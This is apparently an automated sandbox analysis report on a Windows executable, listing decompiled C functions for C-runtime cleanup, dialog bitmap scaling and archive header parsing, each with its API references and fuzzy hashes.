    • Opcode Fuzzy Hash: f3f28e10ae020be253f64a74bf50287a460b9f0fd48d890a16731879a717282c
    • Instruction Fuzzy Hash: 9581AE71608341AFD710DF68DD89B6FBBE9FBC8704F05192DF985E7290D6B0A8098B52
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0085B7DF(intOrPtr _a4) {
    				intOrPtr _v8;
    				intOrPtr _t25;
    				intOrPtr* _t26;
    				intOrPtr _t28;
    				intOrPtr* _t29;
    				intOrPtr* _t31;
    				intOrPtr* _t45;
    				intOrPtr* _t46;
    				intOrPtr* _t47;
    				intOrPtr* _t55;
    				intOrPtr* _t70;
    				intOrPtr _t74;
    
    				_t74 = _a4;
    				_t25 =  *((intOrPtr*)(_t74 + 0x88));
    				if(_t25 != 0 && _t25 != 0x86dd50) {
    					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
    					if(_t45 != 0 &&  *_t45 == 0) {
    						_t46 =  *((intOrPtr*)(_t74 + 0x84));
    						if(_t46 != 0 &&  *_t46 == 0) {
    							E00857AC6(_t46);
    							E0085B3BE( *((intOrPtr*)(_t74 + 0x88)));
    						}
    						_t47 =  *((intOrPtr*)(_t74 + 0x80));
    						if(_t47 != 0 &&  *_t47 == 0) {
    							E00857AC6(_t47);
    							E0085B4BC( *((intOrPtr*)(_t74 + 0x88)));
    						}
    						E00857AC6( *((intOrPtr*)(_t74 + 0x7c)));
    						E00857AC6( *((intOrPtr*)(_t74 + 0x88)));
    					}
    				}
    				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
    				if(_t26 != 0 &&  *_t26 == 0) {
    					E00857AC6( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
    					E00857AC6( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
    					E00857AC6( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
    					E00857AC6( *((intOrPtr*)(_t74 + 0x8c)));
    				}
    				E0085B952( *((intOrPtr*)(_t74 + 0x9c)));
    				_t28 = 6;
    				_t55 = _t74 + 0xa0;
    				_v8 = _t28;
    				_t70 = _t74 + 0x28;
    				do {
    					if( *((intOrPtr*)(_t70 - 8)) != 0x86d818) {
    						_t31 =  *_t70;
    						if(_t31 != 0 &&  *_t31 == 0) {
    							E00857AC6(_t31);
    							E00857AC6( *_t55);
    						}
    						_t28 = _v8;
    					}
    					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
    						_t29 =  *((intOrPtr*)(_t70 - 4));
    						if(_t29 != 0 &&  *_t29 == 0) {
    							E00857AC6(_t29);
    						}
    						_t28 = _v8;
    					}
    					_t55 = _t55 + 4;
    					_t70 = _t70 + 0x10;
    					_t28 = _t28 - 1;
    					_v8 = _t28;
    				} while (_t28 != 0);
    				return E00857AC6(_t74);
    			}















    0x0085b7e7
    0x0085b7eb
    0x0085b7f3
    0x0085b7fc
    0x0085b801
    0x0085b808
    0x0085b810
    0x0085b818
    0x0085b823
    0x0085b829
    0x0085b82a
    0x0085b832
    0x0085b83a
    0x0085b845
    0x0085b84b
    0x0085b84f
    0x0085b85a
    0x0085b860
    0x0085b801
    0x0085b861
    0x0085b869
    0x0085b87c
    0x0085b88f
    0x0085b89d
    0x0085b8a8
    0x0085b8ad
    0x0085b8b6
    0x0085b8be
    0x0085b8bf
    0x0085b8c5
    0x0085b8c8
    0x0085b8cb
    0x0085b8d2
    0x0085b8d4
    0x0085b8d8
    0x0085b8e0
    0x0085b8e7
    0x0085b8ed
    0x0085b8ee
    0x0085b8ee
    0x0085b8f5
    0x0085b8f7
    0x0085b8fc
    0x0085b904
    0x0085b909
    0x0085b90a
    0x0085b90a
    0x0085b90d
    0x0085b910
    0x0085b913
    0x0085b916
    0x0085b916
    0x0085b928

    APIs
    • ___free_lconv_mon.LIBCMT ref: 0085B823
      • Part of subcall function 0085B3BE: _free.LIBCMT ref: 0085B3DB
      • Part of subcall function 0085B3BE: _free.LIBCMT ref: 0085B3ED
      • Part of subcall function 0085B3BE: _free.LIBCMT ref: 0085B3FF
      • Part of subcall function 0085B3BE: _free.LIBCMT ref: 0085B411
      • Part of subcall function 0085B3BE: _free.LIBCMT ref: 0085B423
      • Part of subcall function 0085B3BE: _free.LIBCMT ref: 0085B435
      • Part of subcall function 0085B3BE: _free.LIBCMT ref: 0085B447
      • Part of subcall function 0085B3BE: _free.LIBCMT ref: 0085B459
      • Part of subcall function 0085B3BE: _free.LIBCMT ref: 0085B46B
      • Part of subcall function 0085B3BE: _free.LIBCMT ref: 0085B47D
      • Part of subcall function 0085B3BE: _free.LIBCMT ref: 0085B48F
      • Part of subcall function 0085B3BE: _free.LIBCMT ref: 0085B4A1
      • Part of subcall function 0085B3BE: _free.LIBCMT ref: 0085B4B3
    • _free.LIBCMT ref: 0085B818
      • Part of subcall function 00857AC6: RtlFreeHeap.NTDLL(00000000,00000000,?,0085B553,?,00000000,?,00000000,?,0085B57A,?,00000007,?,?,0085B977,?), ref: 00857ADC
      • Part of subcall function 00857AC6: GetLastError.KERNEL32(?,?,0085B553,?,00000000,?,00000000,?,0085B57A,?,00000007,?,?,0085B977,?,?), ref: 00857AEE
    • _free.LIBCMT ref: 0085B83A
    • _free.LIBCMT ref: 0085B84F
    • _free.LIBCMT ref: 0085B85A
    • _free.LIBCMT ref: 0085B87C
    • _free.LIBCMT ref: 0085B88F
    • _free.LIBCMT ref: 0085B89D
    • _free.LIBCMT ref: 0085B8A8
    • _free.LIBCMT ref: 0085B8E0
    • _free.LIBCMT ref: 0085B8E7
    • _free.LIBCMT ref: 0085B904
    • _free.LIBCMT ref: 0085B91C
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
    • String ID:
    • API String ID: 161543041-0
    • Opcode ID: fa607964d2ec0f230f8e713a6842d88313795881b9104556deacac59d888fd88
    • Instruction ID: 96eb8b136f57b044cd5ecaaba6f05c0fc0d9d413e4ccbe0748ee16cf9cbbb0b2
    • Opcode Fuzzy Hash: fa607964d2ec0f230f8e713a6842d88313795881b9104556deacac59d888fd88
    • Instruction Fuzzy Hash: 5B315E31A04305AFEB31AE39E845B5A77ECFF50392F149429FC58D7252DB30AD488B11
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0084C399(void* __edx, void* __eflags, void* __fp0, struct HWND__* _a4) {
    				intOrPtr _v20;
    				intOrPtr _v24;
    				void _v28;
    				short _v4124;
    				void* _t10;
    				struct HWND__* _t11;
    				void* _t21;
    				void* _t28;
    				void* _t29;
    				void* _t31;
    				struct HWND__* _t34;
    				void* _t45;
    
    				_t45 = __fp0;
    				_t29 = __edx;
    				E0084D9C0();
    				_t10 = E0084959D(__eflags);
    				if(_t10 == 0) {
    					return _t10;
    				}
    				_t11 = GetWindow(_a4, 5);
    				_t34 = _t11;
    				_t31 = 0;
    				_a4 = _t34;
    				if(_t34 == 0) {
    					L11:
    					return _t11;
    				}
    				while(_t31 < 0x200) {
    					GetClassNameW(_t34,  &_v4124, 0x800);
    					if(E00841438( &_v4124, L"STATIC") == 0 && (GetWindowLongW(_t34, 0xfffffff0) & 0x0000001f) == 0xe) {
    						_t28 = SendMessageW(_t34, 0x173, 0, 0);
    						if(_t28 != 0) {
    							GetObjectW(_t28, 0x18,  &_v28);
    							_t21 = E008495FF(_v20);
    							SendMessageW(_t34, 0x172, 0, E008497D0(_t29, _t45, _t28, E008495BC(_v24), _t21));
    							DeleteObject(_t28);
    						}
    					}
    					_t11 = GetWindow(_t34, 2);
    					_t34 = _t11;
    					if(_t34 != _a4) {
    						_t31 = _t31 + 1;
    						if(_t34 != 0) {
    							continue;
    						}
    					}
    					break;
    				}
    				goto L11;
    			}















    0x0084c399
    0x0084c399
    0x0084c3a1
    0x0084c3a6
    0x0084c3ad
    0x0084c484
    0x0084c484
    0x0084c3ba
    0x0084c3c0
    0x0084c3c2
    0x0084c3c4
    0x0084c3c9
    0x0084c47f
    0x00000000
    0x0084c480
    0x0084c3d0
    0x0084c3e9
    0x0084c402
    0x0084c424
    0x0084c428
    0x0084c431
    0x0084c43a
    0x0084c458
    0x0084c45f
    0x0084c45f
    0x0084c428
    0x0084c468
    0x0084c46e
    0x0084c473
    0x0084c475
    0x0084c478
    0x00000000
    0x00000000
    0x0084c478
    0x00000000
    0x0084c473
    0x00000000

    APIs
    • GetWindow.USER32(?,00000005), ref: 0084C3BA
    • GetClassNameW.USER32(00000000,?,00000800), ref: 0084C3E9
      • Part of subcall function 00841438: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,0083ADA2,?,?,?,0083AD51,?,-00000002,?,00000000,?), ref: 0084144E
    • GetWindowLongW.USER32(00000000,000000F0), ref: 0084C407
    • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 0084C41E
    • GetObjectW.GDI32(00000000,00000018,?), ref: 0084C431
      • Part of subcall function 008495FF: GetDC.USER32(00000000), ref: 0084960B
      • Part of subcall function 008495FF: GetDeviceCaps.GDI32(00000000,0000005A), ref: 0084961A
      • Part of subcall function 008495FF: ReleaseDC.USER32(00000000,00000000), ref: 00849628
      • Part of subcall function 008495BC: GetDC.USER32(00000000), ref: 008495C8
      • Part of subcall function 008495BC: GetDeviceCaps.GDI32(00000000,00000058), ref: 008495D7
      • Part of subcall function 008495BC: ReleaseDC.USER32(00000000,00000000), ref: 008495E5
    • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0084C458
    • DeleteObject.GDI32(00000000), ref: 0084C45F
    • GetWindow.USER32(00000000,00000002), ref: 0084C468
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: Window$CapsDeviceMessageObjectReleaseSend$ClassCompareDeleteLongNameString
    • String ID: STATIC
    • API String ID: 1444658586-1882779555
    • Opcode ID: ce47bc7f68279f716f5691e0c3f459f0351846cc00c0d7d0f8e1be33f2eb9f6a
    • Instruction ID: b975213cbde40a2cd06a5aac24737e5a085af77cf8651e78d105703df4bcbb39
    • Opcode Fuzzy Hash: ce47bc7f68279f716f5691e0c3f459f0351846cc00c0d7d0f8e1be33f2eb9f6a
    • Instruction Fuzzy Hash: E521C372A4172C7BEB216B649C4AFEF762CFB15B10F015111FA41E6191CAA44A4186A9
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0085847D(char _a4) {
    				char _v8;
    
    				_t26 = _a4;
    				_t52 =  *_a4;
    				if( *_a4 != 0x864be0) {
    					E00857AC6(_t52);
    					_t26 = _a4;
    				}
    				E00857AC6( *((intOrPtr*)(_t26 + 0x3c)));
    				E00857AC6( *((intOrPtr*)(_a4 + 0x30)));
    				E00857AC6( *((intOrPtr*)(_a4 + 0x34)));
    				E00857AC6( *((intOrPtr*)(_a4 + 0x38)));
    				E00857AC6( *((intOrPtr*)(_a4 + 0x28)));
    				E00857AC6( *((intOrPtr*)(_a4 + 0x2c)));
    				E00857AC6( *((intOrPtr*)(_a4 + 0x40)));
    				E00857AC6( *((intOrPtr*)(_a4 + 0x44)));
    				E00857AC6( *((intOrPtr*)(_a4 + 0x360)));
    				_v8 =  &_a4;
    				E00858343(5,  &_v8);
    				_v8 =  &_a4;
    				return E00858393(4,  &_v8);
    			}




    0x00858483
    0x00858486
    0x0085848e
    0x00858491
    0x00858496
    0x00858499
    0x0085849d
    0x008584a8
    0x008584b3
    0x008584be
    0x008584c9
    0x008584d4
    0x008584df
    0x008584ea
    0x008584f8
    0x00858500
    0x00858509
    0x00858511
    0x00858525

    APIs
    • _free.LIBCMT ref: 00858491
      • Part of subcall function 00857AC6: RtlFreeHeap.NTDLL(00000000,00000000,?,0085B553,?,00000000,?,00000000,?,0085B57A,?,00000007,?,?,0085B977,?), ref: 00857ADC
      • Part of subcall function 00857AC6: GetLastError.KERNEL32(?,?,0085B553,?,00000000,?,00000000,?,0085B57A,?,00000007,?,?,0085B977,?,?), ref: 00857AEE
    • _free.LIBCMT ref: 0085849D
    • _free.LIBCMT ref: 008584A8
    • _free.LIBCMT ref: 008584B3
    • _free.LIBCMT ref: 008584BE
    • _free.LIBCMT ref: 008584C9
    • _free.LIBCMT ref: 008584D4
    • _free.LIBCMT ref: 008584DF
    • _free.LIBCMT ref: 008584EA
    • _free.LIBCMT ref: 008584F8
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: _free$ErrorFreeHeapLast
    • String ID:
    • API String ID: 776569668-0
    • Opcode ID: a8a36c13d1225145bac788d21c89b73516eb21a147c0e1125c9d561d064d59c4
    • Instruction ID: f7904fee7d9a8a5b8895d1ea4742885ef918140bb2b84cf9c7f63e92d6505de7
    • Opcode Fuzzy Hash: a8a36c13d1225145bac788d21c89b73516eb21a147c0e1125c9d561d064d59c4
    • Instruction Fuzzy Hash: E011A476104118FFCB02EF98D942CDD3FA9FF44351B0585A1BE088F222EA31EB589B81
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 93%
    			E008320F7(intOrPtr __ecx) {
    				signed int _t135;
    				void* _t137;
    				signed int _t139;
    				unsigned int _t140;
    				signed int _t144;
    				signed int _t161;
    				signed int _t164;
    				void* _t167;
    				void* _t172;
    				signed int _t175;
    				signed char _t178;
    				signed char _t179;
    				signed char _t180;
    				signed int _t182;
    				signed int _t185;
    				signed int _t187;
    				signed int _t188;
    				signed char _t220;
    				signed char _t232;
    				signed int _t233;
    				signed int _t236;
    				intOrPtr _t240;
    				signed int _t244;
    				signed int _t246;
    				signed int _t247;
    				signed int _t257;
    				signed int _t258;
    				signed char _t262;
    				signed int _t263;
    				signed int _t265;
    				intOrPtr _t272;
    				intOrPtr _t275;
    				intOrPtr _t278;
    				intOrPtr _t314;
    				signed int _t315;
    				intOrPtr _t318;
    				signed int _t322;
    				void* _t323;
    				void* _t324;
    				void* _t326;
    				void* _t327;
    				void* _t328;
    				void* _t329;
    				void* _t330;
    				void* _t331;
    				void* _t332;
    				void* _t333;
    				void* _t334;
    				intOrPtr* _t336;
    				signed int _t339;
    				void* _t340;
    				signed int _t341;
    				char* _t342;
    				void* _t343;
    				void* _t344;
    				signed int _t348;
    				signed int _t351;
    				signed int _t366;
    
    				E0084D9C0();
    				_t318 =  *((intOrPtr*)(_t344 + 0x20b8));
    				 *((intOrPtr*)(_t344 + 0xc)) = __ecx;
    				_t314 =  *((intOrPtr*)(_t318 + 0x18));
    				_t135 = _t314 -  *((intOrPtr*)(_t344 + 0x20bc));
    				if(_t135 <  *(_t318 + 0x1c)) {
    					L104:
    					return _t135;
    				}
    				_t315 = _t314 - _t135;
    				 *(_t318 + 0x1c) = _t135;
    				if(_t315 >= 2) {
    					_t240 =  *((intOrPtr*)(_t344 + 0x20c4));
    					while(1) {
    						_t135 = E0083C43B(_t315);
    						_t244 = _t135;
    						_t348 = _t315;
    						if(_t348 < 0 || _t348 <= 0 && _t244 == 0) {
    							break;
    						}
    						_t322 =  *(_t318 + 0x1c);
    						_t135 =  *((intOrPtr*)(_t318 + 0x18)) - _t322;
    						if(_t135 == 0) {
    							break;
    						}
    						_t351 = _t315;
    						if(_t351 > 0 || _t351 >= 0 && _t244 > _t135) {
    							break;
    						} else {
    							_t339 = _t322 + _t244;
    							 *(_t344 + 0x28) = _t339;
    							_t137 = E0083C43B(_t315);
    							_t340 = _t339 -  *(_t318 + 0x1c);
    							_t323 = _t137;
    							_t135 = _t315;
    							_t246 = 0;
    							 *(_t344 + 0x24) = _t135;
    							 *(_t344 + 0x20) = 0;
    							if(0 < 0 || 0 <= 0 && _t340 < 0) {
    								break;
    							} else {
    								if( *((intOrPtr*)(_t240 + 4)) == 1 && _t323 == 1 && _t135 == 0) {
    									 *((char*)(_t240 + 0x1e)) = 1;
    									_t232 = E0083C43B(_t315);
    									 *(_t344 + 0x1c) = _t232;
    									if((_t232 & 0x00000001) != 0) {
    										_t236 = E0083C43B(_t315);
    										if((_t236 | _t315) != 0) {
    											asm("adc eax, edx");
    											 *((intOrPtr*)(_t240 + 0x20)) =  *((intOrPtr*)( *((intOrPtr*)(_t344 + 0x18)) + 0x6ca0)) + _t236;
    											 *((intOrPtr*)(_t240 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t344 + 0x18)) + 0x6ca4));
    										}
    										_t232 =  *(_t344 + 0x1c);
    									}
    									if((_t232 & 0x00000002) != 0) {
    										_t233 = E0083C43B(_t315);
    										if((_t233 | _t315) != 0) {
    											asm("adc eax, edx");
    											 *((intOrPtr*)(_t240 + 0x30)) =  *((intOrPtr*)( *((intOrPtr*)(_t344 + 0x18)) + 0x6ca0)) + _t233;
    											 *((intOrPtr*)(_t240 + 0x34)) =  *((intOrPtr*)( *((intOrPtr*)(_t344 + 0x18)) + 0x6ca4));
    										}
    									}
    									_t246 =  *(_t344 + 0x20);
    									_t135 =  *(_t344 + 0x24);
    								}
    								if( *((intOrPtr*)(_t240 + 4)) == 2 ||  *((intOrPtr*)(_t240 + 4)) == 3) {
    									_t366 = _t135;
    									if(_t366 > 0 || _t366 >= 0 && _t323 > 7) {
    										goto L102;
    									} else {
    										_t324 = _t323 - 1;
    										if(_t324 == 0) {
    											_t139 = E0083C43B(_t315);
    											__eflags = _t139;
    											if(_t139 == 0) {
    												_t140 = E0083C43B(_t315);
    												 *(_t240 + 0x10c1) = _t140 & 0x00000001;
    												 *(_t240 + 0x10ca) = _t140 >> 0x00000001 & 0x00000001;
    												_t144 = E0083C2EE(_t318) & 0x000000ff;
    												 *(_t240 + 0x10ec) = _t144;
    												__eflags = _t144 - 0x18;
    												if(_t144 > 0x18) {
    													E00833F53(_t344 + 0x38, 0x14, L"xc%u", _t144);
    													_t257 =  *(_t344 + 0x28);
    													_t167 = _t344 + 0x40;
    													_t344 = _t344 + 0x10;
    													E00833EFE(_t257, _t240 + 0x28, _t167);
    												}
    												E0083C39D(_t318, _t240 + 0x10a1, 0x10);
    												E0083C39D(_t318, _t240 + 0x10b1, 0x10);
    												__eflags =  *(_t240 + 0x10c1);
    												if( *(_t240 + 0x10c1) != 0) {
    													_t325 = _t240 + 0x10c2;
    													E0083C39D(_t318, _t240 + 0x10c2, 8);
    													E0083C39D(_t318, _t344 + 0x30, 4);
    													E0083F55A(_t344 + 0x58);
    													E0083F5A0(_t344 + 0x60, _t240 + 0x10c2, 8);
    													_push(_t344 + 0x30);
    													E0083F46B(_t344 + 0x5c);
    													_t161 = E0084F3CA(_t344 + 0x34, _t344 + 0x34, 4);
    													_t344 = _t344 + 0xc;
    													asm("sbb al, al");
    													__eflags =  *((intOrPtr*)(_t240 + 4)) - 3;
    													 *(_t240 + 0x10c1) =  ~_t161 + 1;
    													if( *((intOrPtr*)(_t240 + 4)) == 3) {
    														_t164 = E0084F3CA(_t325, 0x862398, 8);
    														_t344 = _t344 + 0xc;
    														__eflags = _t164;
    														if(_t164 == 0) {
    															 *(_t240 + 0x10c1) = _t164;
    														}
    													}
    												}
    												 *((char*)(_t240 + 0x10a0)) = 1;
    												 *((intOrPtr*)(_t240 + 0x109c)) = 5;
    												 *((char*)(_t240 + 0x109b)) = 1;
    											} else {
    												E00833F53(_t344 + 0x38, 0x14, L"x%u", _t139);
    												_t258 =  *(_t344 + 0x28);
    												_t172 = _t344 + 0x40;
    												_t344 = _t344 + 0x10;
    												E00833EFE(_t258, _t240 + 0x28, _t172);
    											}
    											goto L102;
    										}
    										_t326 = _t324 - 1;
    										if(_t326 == 0) {
    											_t175 = E0083C43B(_t315);
    											__eflags = _t175;
    											if(_t175 != 0) {
    												goto L102;
    											}
    											_push(0x20);
    											 *((intOrPtr*)(_t240 + 0x1070)) = 3;
    											_push(_t240 + 0x1074);
    											L40:
    											E0083C39D(_t318);
    											goto L102;
    										}
    										_t327 = _t326 - 1;
    										if(_t327 == 0) {
    											__eflags = _t246;
    											if(__eflags < 0) {
    												goto L102;
    											}
    											if(__eflags > 0) {
    												L65:
    												_t178 = E0083C43B(_t315);
    												 *(_t344 + 0x13) = _t178;
    												_t179 = _t178 & 0x00000001;
    												_t262 =  *(_t344 + 0x13);
    												 *(_t344 + 0x14) = _t179;
    												_t315 = _t262 & 0x00000002;
    												__eflags = _t315;
    												 *(_t344 + 0x15) = _t315;
    												if(_t315 != 0) {
    													_t278 = _t318;
    													__eflags = _t179;
    													if(__eflags == 0) {
    														E00840A8C(_t240 + 0x1040, _t315, E0083C37D(_t278, __eflags), _t315);
    													} else {
    														E00840A4D(_t240 + 0x1040, _t315, E0083C33B(_t278), 0);
    													}
    													_t262 =  *(_t344 + 0x13);
    													_t179 =  *(_t344 + 0x14);
    												}
    												_t263 = _t262 & 0x00000004;
    												__eflags = _t263;
    												 *(_t344 + 0x16) = _t263;
    												if(_t263 != 0) {
    													_t275 = _t318;
    													__eflags = _t179;
    													if(__eflags == 0) {
    														E00840A8C(_t240 + 0x1048, _t315, E0083C37D(_t275, __eflags), _t315);
    													} else {
    														E00840A4D(_t240 + 0x1048, _t315, E0083C33B(_t275), 0);
    													}
    												}
    												_t180 =  *(_t344 + 0x13);
    												_t265 = _t180 & 0x00000008;
    												__eflags = _t265;
    												 *(_t344 + 0x17) = _t265;
    												if(_t265 != 0) {
    													__eflags =  *(_t344 + 0x14);
    													_t272 = _t318;
    													if(__eflags == 0) {
    														E00840A8C(_t240 + 0x1050, _t315, E0083C37D(_t272, __eflags), _t315);
    													} else {
    														E00840A4D(_t240 + 0x1050, _t315, E0083C33B(_t272), 0);
    													}
    													_t180 =  *(_t344 + 0x13);
    												}
    												__eflags =  *(_t344 + 0x14);
    												if( *(_t344 + 0x14) != 0) {
    													__eflags = _t180 & 0x00000010;
    													if((_t180 & 0x00000010) != 0) {
    														__eflags =  *(_t344 + 0x15);
    														if( *(_t344 + 0x15) == 0) {
    															_t341 = 0x3fffffff;
    															_t328 = 0x3b9aca00;
    														} else {
    															_t187 = E0083C33B(_t318);
    															_t341 = 0x3fffffff;
    															_t328 = 0x3b9aca00;
    															_t188 = _t187 & 0x3fffffff;
    															__eflags = _t188 - 0x3b9aca00;
    															if(_t188 < 0x3b9aca00) {
    																E008406F8(_t240 + 0x1040, _t188, 0);
    															}
    														}
    														__eflags =  *(_t344 + 0x16);
    														if( *(_t344 + 0x16) != 0) {
    															_t185 = E0083C33B(_t318) & _t341;
    															__eflags = _t185 - _t328;
    															if(_t185 < _t328) {
    																E008406F8(_t240 + 0x1048, _t185, 0);
    															}
    														}
    														__eflags =  *(_t344 + 0x17);
    														if( *(_t344 + 0x17) != 0) {
    															_t182 = E0083C33B(_t318) & _t341;
    															__eflags = _t182 - _t328;
    															if(_t182 < _t328) {
    																E008406F8(_t240 + 0x1050, _t182, 0);
    															}
    														}
    													}
    												}
    												goto L102;
    											}
    											__eflags = _t340 - 5;
    											if(_t340 < 5) {
    												goto L102;
    											}
    											goto L65;
    										}
    										_t329 = _t327 - 1;
    										if(_t329 == 0) {
    											__eflags = _t246;
    											if(__eflags < 0) {
    												goto L102;
    											}
    											if(__eflags > 0) {
    												L60:
    												E0083C43B(_t315);
    												__eflags = E0083C43B(_t315);
    												if(__eflags != 0) {
    													 *((char*)(_t240 + 0x10f3)) = 1;
    													E00833F53(_t344 + 0x38, 0x14, L";%u", _t203);
    													_t344 = _t344 + 0x10;
    													E0083FABF(__eflags, _t240 + 0x28, _t344 + 0x30, 0x800);
    												}
    												goto L102;
    											}
    											__eflags = _t340 - 1;
    											if(_t340 < 1) {
    												goto L102;
    											}
    											goto L60;
    										}
    										_t330 = _t329 - 1;
    										if(_t330 == 0) {
    											 *((intOrPtr*)(_t240 + 0x1100)) = E0083C43B(_t315);
    											 *(_t240 + 0x2104) = E0083C43B(_t315) & 0x00000001;
    											_t331 = E0083C43B(_t315);
    											 *((char*)(_t344 + 0xc0)) = 0;
    											__eflags = _t331 - 0x1fff;
    											if(_t331 < 0x1fff) {
    												E0083C39D(_t318, _t344 + 0xc4, _t331);
    												 *((char*)(_t344 + _t331 + 0xc0)) = 0;
    											}
    											E0083BA7B(_t344 + 0xc4, _t344 + 0xc4, 0x2000);
    											_push(0x800);
    											_push(_t240 + 0x1104);
    											_push(_t344 + 0xc8);
    											E008410BC();
    											goto L102;
    										}
    										_t332 = _t330 - 1;
    										if(_t332 == 0) {
    											_t220 = E0083C43B(_t315);
    											 *(_t344 + 0x1c) = _t220;
    											_t342 = _t240 + 0x2108;
    											 *(_t240 + 0x2106) = _t220 >> 0x00000002 & 0x00000001;
    											 *(_t240 + 0x2107) = _t220 >> 0x00000003 & 0x00000001;
    											 *((char*)(_t240 + 0x2208)) = 0;
    											 *_t342 = 0;
    											__eflags = _t220 & 0x00000001;
    											if((_t220 & 0x00000001) != 0) {
    												_t334 = E0083C43B(_t315);
    												__eflags = _t334 - 0xff;
    												if(_t334 >= 0xff) {
    													_t334 = 0xff;
    												}
    												E0083C39D(_t318, _t342, _t334);
    												_t220 =  *(_t344 + 0x1c);
    												 *((char*)(_t334 + _t342)) = 0;
    											}
    											__eflags = _t220 & 0x00000002;
    											if((_t220 & 0x00000002) != 0) {
    												_t333 = E0083C43B(_t315);
    												__eflags = _t333 - 0xff;
    												if(_t333 >= 0xff) {
    													_t333 = 0xff;
    												}
    												_t343 = _t240 + 0x2208;
    												E0083C39D(_t318, _t343, _t333);
    												 *((char*)(_t333 + _t343)) = 0;
    											}
    											__eflags =  *(_t240 + 0x2106);
    											if( *(_t240 + 0x2106) != 0) {
    												 *((intOrPtr*)(_t240 + 0x2308)) = E0083C43B(_t315);
    											}
    											__eflags =  *(_t240 + 0x2107);
    											if( *(_t240 + 0x2107) != 0) {
    												 *((intOrPtr*)(_t240 + 0x230c)) = E0083C43B(_t315);
    											}
    											 *((char*)(_t240 + 0x2105)) = 1;
    											goto L102;
    										}
    										if(_t332 != 1) {
    											goto L102;
    										}
    										if( *((intOrPtr*)(_t240 + 4)) == 3 &&  *((intOrPtr*)(_t318 + 0x18)) -  *(_t344 + 0x28) == 1) {
    											_t340 = _t340 + 1;
    										}
    										_t336 = _t240 + 0x1028;
    										E00831FC9(_t336, _t340);
    										_push(_t340);
    										_push( *_t336);
    										goto L40;
    									}
    								} else {
    									L102:
    									_t247 =  *(_t344 + 0x28);
    									 *(_t318 + 0x1c) = _t247;
    									_t135 =  *((intOrPtr*)(_t318 + 0x18)) - _t247;
    									if(_t135 >= 2) {
    										continue;
    									}
    									break;
    								}
    							}
    						}
    					}
    				}
    			}





























































    0x008320fc
    0x00832102
    0x00832109
    0x0083210d
    0x00832112
    0x0083211c
    0x00832773
    0x0083277a
    0x0083277a
    0x00832122
    0x00832124
    0x0083212a
    0x00832131
    0x0083213a
    0x0083213c
    0x00832141
    0x00832143
    0x00832145
    0x00000000
    0x00000000
    0x00832158
    0x0083215b
    0x0083215d
    0x00000000
    0x00000000
    0x00832163
    0x00832165
    0x00000000
    0x00832175
    0x00832175
    0x0083217a
    0x0083217e
    0x00832183
    0x00832186
    0x00832188
    0x0083218a
    0x0083218c
    0x00832190
    0x00832194
    0x00000000
    0x008321a4
    0x008321a8
    0x008321b9
    0x008321bd
    0x008321c2
    0x008321c8
    0x008321cc
    0x008321d5
    0x008321ed
    0x008321ef
    0x008321f2
    0x008321f2
    0x008321f5
    0x008321f5
    0x008321fb
    0x008321ff
    0x00832208
    0x00832220
    0x00832222
    0x00832225
    0x00832225
    0x00832208
    0x00832228
    0x0083222c
    0x0083222c
    0x00832234
    0x00832240
    0x00832242
    0x00000000
    0x00832253
    0x00832253
    0x00832256
    0x00832605
    0x0083260a
    0x0083260c
    0x0083263c
    0x0083264a
    0x00832652
    0x0083265d
    0x00832660
    0x00832666
    0x00832669
    0x00832678
    0x0083267d
    0x00832681
    0x00832685
    0x0083268d
    0x0083268d
    0x0083269d
    0x008326ad
    0x008326b2
    0x008326b9
    0x008326c1
    0x008326ca
    0x008326d8
    0x008326e2
    0x008326ef
    0x008326f8
    0x008326fe
    0x0083270f
    0x00832714
    0x00832719
    0x0083271d
    0x00832721
    0x00832727
    0x00832731
    0x00832736
    0x00832739
    0x0083273b
    0x0083273d
    0x0083273d
    0x0083273b
